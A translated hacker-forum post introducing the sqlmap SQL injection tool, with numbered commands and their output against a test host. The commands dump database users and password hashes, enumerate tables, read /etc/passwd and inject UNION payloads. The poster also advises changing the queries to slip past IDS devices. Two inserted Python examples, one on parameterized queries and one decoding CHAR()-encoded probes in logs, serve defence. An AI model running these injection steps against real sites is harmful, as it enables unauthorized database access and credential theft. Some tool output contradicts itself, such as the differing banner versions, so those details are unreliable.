Introduction to the SQLmap tool and its use

This was written by brother SEVEN!:
I saw on 黑防 (Hacker Defense) that they mentioned some internal tool, a foreign injection tool written in Python. I wanted to download it and take a look, but it turned out to be a VIP-only tool.
So I searched Baidu and found nothing. It seems it has not become popular domestically yet. So I went straight to Google.
And I found this tool.
It is extremely powerful.
Everything I had been thinking of, this tool already implements, and with even more functionality. A powerful new-generation tool. I have not had time to analyze it yet; friends who are interested can go study it.
Open source and powerful.
Please try not to pass it around.
It supports almost every database in use today, stronger than any domestic tool. I am starting to wonder whether 穿山甲 (Pangolin) is derived from it.
Supports GET, POST and cookie injection. You can add a cookie and a user-agent.
Supports blind injection, error-based injection and several other injection methods.
Supports proxies.
Optimized algorithms, more efficient.
Fingerprinting to identify the database.
The documentation follows.
Here is a list of major features implemented in sqlmap:
* Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end. Besides these four DBMS, sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;
* Extensive database management system back-end fingerprint based upon:
  o Inband DBMS error messages
  o DBMS banner parsing
  o DBMS functions output comparison
  o DBMS specific features such as MySQL comment injection
  o Passive SQL injection fuzzing
* It fully supports two SQL injection techniques:
  o Blind SQL injection, also known as Inference SQL injection
  o Inband SQL injection, also known as UNION query SQL injection
  and it partially supports error based SQL injection as one of the vectors for database management system fingerprint;
* It automatically tests all provided GET, POST, Cookie and User-Agent parameters to find dynamic ones. On these it automatically tests and detects the ones affected by SQL injection. Moreover each dynamic parameter is tested for numeric, single quoted string, double quoted string and all of these three types with one and two brackets to find which is the valid syntax to perform further injections with;
* It is possible to provide the name of the only parameter(s) that you want to perform tests and use for injection on, being them GET, POST, Cookie parameters;
* SQL injection testing and detection does not depend upon the web application database management system back-end. SQL injection exploiting and query syntax obviously depend upon the web application database management system back-end;
* It recognizes valid queries by false ones based upon HTML output page hashes comparison by default, but it is also possible to choose to perform such test based upon string matching;
* HTTP requests can be performed in both HTTP method GET and POST (default: GET);
* It is possible to perform HTTP requests using a HTTP User-Agent header string randomly selected from a text file;
* It is possible to provide a HTTP Cookie header string, useful when the web application requires authentication based upon cookies and you have such data;
* It is possible to provide an anonymous HTTP proxy address and port to pass by the HTTP requests to the target URL;
* It is possible to provide the remote DBMS back-end if you already know it, making sqlmap save some time to fingerprint it;
* It supports various command line options to get database management system banner, current DBMS user, current DBMS database, enumerate users, users password hashes, databases, tables, columns, dump tables entries, dump the entire DBMS, retrieve an arbitrary file content (if the remote DBMS is MySQL) and provide your own SQL SELECT statement to be evaluated;
* It is possible to make sqlmap automatically detect if the affected parameter is also affected by an UNION query SQL injection and, in such case, to use it to exploit the vulnerability;
* It is possible to exclude system databases when enumerating tables, useful when dumping the entire DBMS databases tables entries and you want to skip the default DBMS data;
* It is possible to view the Estimated time of arrival for each query output, updated in real time while performing the SQL injection attack;
* Support to increase the verbosity level of output messages;
* It is possible to save queries performed and their retrieved value in real time on an output text file and continue the injection resuming from such file in a second time;
* PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR (or similar) DBMS specific function.
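The feature list above describes how sqlmap probes each dynamic parameter with numeric and quoted syntaxes and tells true from false responses by comparing the returned pages. The following added example (not part of the original post and not sqlmap's own code) shows why a `page.php?id=` style lookup answers those probes when the value is concatenated into the query, and how type allow-listing plus parameter binding closes it; it uses a constructed in-memory SQLite table as a stand-in for the back-end, and the UNION probe string is the one sqlmap's union check prints later on this page.

```python
import sqlite3

# Probe values constructed from what this page shows: sqlmap's union check
# appends "UNION ALL SELECT NULL, NULL, NULL--", and its blind tests append a
# boolean condition to a numeric/unescaped parameter.
UNION_PROBE = "1 UNION ALL SELECT NULL, NULL, NULL--"
BOOLEAN_PROBE = "1 AND 1=2"


def make_db():
    """Constructed in-memory stand-in for the table behind page.php?id=..."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE page (id INTEGER, cat INTEGER, title TEXT)")
    conn.executemany("INSERT INTO page VALUES (?, ?, ?)",
                     [(1, 2, "first"), (2, 2, "second")])
    return conn


def lookup_vulnerable(conn, id_value):
    """Concatenates the raw parameter: the client now controls SQL syntax.

    A UNION probe adds rows the page never had, and a false boolean probe
    empties the result; that page difference is what sqlmap's hash
    comparison detects.
    """
    sql = "SELECT id, cat, title FROM page WHERE id=" + id_value
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, id_value):
    """Allow-list the expected type, then bind the value as a parameter.

    Anything that is not a plain integer is rejected before the DBMS sees
    it, and a bound value can never be parsed as SQL.
    """
    if not id_value.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT id, cat, title FROM page WHERE id=?", (int(id_value),)
    ).fetchall()


def compare(id_value):
    """Run both lookups on the same value and report what each returned."""
    conn = make_db()
    vuln = lookup_vulnerable(conn, id_value)
    try:
        hardened = lookup_hardened(conn, id_value)
    except ValueError as exc:
        hardened = "rejected: %s" % exc
    return {"vulnerable": vuln, "hardened": hardened}
```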
Last night I could not resist, so I read some of it and then tested it. The SQL statements inside are too simple, but you can customize them and modify them into more elaborate statements to get past injection detection and other IDS devices.
A bit later I will compile a DOS version for you.
1. First install Python 2.5.
2. Then go into the sqlmap directory and run sqlmap.
Detailed usage
1. sqlmap -u <injection point>
2. sqlmap -g "keyword" // this injects via Google search; it does not work right now, I do not know why; you can change it to Baidu directly
3. Basic run against a URL:
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0
4. Injecting a specified parameter
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id"
[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]
Or if you want to provide more than one parameter, for instance:
$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id"
5. Specify the HTTP method and the POST data
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --data "id=1&cat=2"
6. Specify a cookie, so that pages which require a login can be injected
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE"
7. Inject through a proxy
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118"
8. Specify a keyword; it can also be omitted, in which case the program decides automatically from the hash of the returned page
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE"
9. Specify the database, so it does not have to guess among the other databases; this improves efficiency.
--remote-dbms
10. Fingerprint the database type
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
11. Get banner information
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
12. Get the current database, current user, all users, passwords, and all available databases.
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --current-db
current database: 'testdb'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users 
database management system users [5]: 
[*] 'debian-sys-maint'@'localhost' 
[*] 'root'@'127.0.0.1' 
[*] 'root'@'leboyer' 
[*] 'root'@'localhost' 
[*] 'testuser'@'localhost' 
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --passwords
database management system users password hashes: 
[*] debian-sys-maint [1]: 
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
[*] root [1]: 
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY 
[*] testuser [1]: 
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs 
available databases [3]: 
[*] information_schema 
[*] mysql 
[*] testdb 
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema"
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS                            |
| COLUMN_PRIVILEGES                     |
| COLUMNS                               |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMA_PRIVILEGES                     |
| SCHEMATA                              |
| STATISTICS                            |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLES                                |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --columns -T "user" -D "mysql"
Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| Alter_priv            | enum |
| Alter_routine_priv    | enum |
| Create_priv           | enum |
| Create_routine_priv   | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv      | enum |
| Create_view_priv      | enum |
| Delete_priv           | enum |
| Drop_priv             | enum |
| Execute_priv          | enum |
| File_priv             | enum |
| Grant_priv            | enum |
| Host                  | char |
| Index_priv            | enum |
| Insert_priv           | enum |
| Lock_tables_priv      | enum |
| max_connections       | int  |
| max_questions         | int  |
| max_updates           | int  |
| max_user_connections  | int  |
| Password              | char |
| Process_priv          | enum |
| References_priv       | enum |
| Reload_priv           | enum |
| Repl_client_priv      | enum |
| Repl_slave_priv       | enum |
| Select_priv           | enum |
| Show_db_priv          | enum |
| Show_view_priv        | enum |
| Shutdown_priv         | enum |
| ssl_cipher            | blob |
| ssl_type              | enum |
| Super_priv            | enum |
| Update_priv           | enum |
| User                  | char |
| x509_issuer           | blob |
| x509_subject          | blob |
+-----------------------+------+
13. Display the contents of a specified file; generally used against PHP
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /etc/passwd
/etc/passwd: 
--- 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/false 
backup:x:34:34:backup:/var/backups:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false 
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash 
--- 
14. Execute your own SQL statement.
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"
[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1: 'YYYYYYYYYYYYYYYY'
15. UNION injection
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union-check
valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --union-use --banner
[...]
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
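The --union-use request above wraps the banner in CHAR() sequences, the same DBMS-specific encoding the feature list describes for the magic_quotes_gpc bypass, so the string literals never appear in the request as text. As an added example (not from the original post and not sqlmap's own code), the following Python decodes CHAR() calls found in web server access-log requests so a defender can read what such a probe actually spells; the log lines are constructed, the second one mirroring the request above.

```python
import re
from urllib.parse import unquote_plus

# Constructed request path mirroring the --union-use banner request above,
# URL-encoded the way a web server would record it in its access log.
UNION_REQ = ("/page.php?id=1%20UNION%20ALL%20SELECT%20CONCAT("
             "CHAR(95,95,83,84,65,82,84,95,95),%20VERSION(),"
             "%20CHAR(95,95,83,84,79,80,95,95)),%20NULL,%20NULL--&cat=2")

# Constructed access-log sample: a normal request, the UNION request, and a
# boolean probe that hides its string literal behind CHAR().
SAMPLE_LOG = "\n".join(
    '192.168.1.10 - - [10/Oct/2008:13:55:3%d +0000] "GET %s HTTP/1.1" 200 512'
    % (i, path)
    for i, path in enumerate([
        "/page.php?id=1&cat=2",
        UNION_REQ,
        "/page.php?id=1%20AND%20CHAR(53)=CHAR(53)&cat=2",
    ])
)

CHAR_CALL = re.compile(r"CHAR\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)
UNION_SELECT = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE)
REQUEST_PATH = re.compile(r'"[A-Z]+\s+(\S+)\s+HTTP/')


def decode_char_calls(text):
    """Replace each CHAR(n, n, ...) call with the quoted string it spells."""
    def spell(m):
        return "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'"
    return CHAR_CALL.sub(spell, text)


def analyze_log(log_text):
    """Return one finding per request whose query string looks like a probe.

    Each finding carries the URL-decoded, CHAR()-decoded request path and the
    reasons it was flagged, so an analyst sees the literal the probe used.
    """
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_PATH.search(line)
        if not m:
            continue
        url = unquote_plus(m.group(1))
        decoded = decode_char_calls(url)
        reasons = []
        if UNION_SELECT.search(decoded):
            reasons.append("union-select")
        if CHAR_CALL.search(url):
            reasons.append("char-encoded-string")
        if reasons:
            findings.append({"url": decoded, "reasons": reasons})
    return findings
```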
16. Save the injection session to a file; the session can also be restored from that file, which is very convenient and a major feature. You can interrupt an injection and continue it when you have time.
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -o "sqlmap.log"
[...]
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --banner -o "sqlmap.log" --resume
[...]
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner: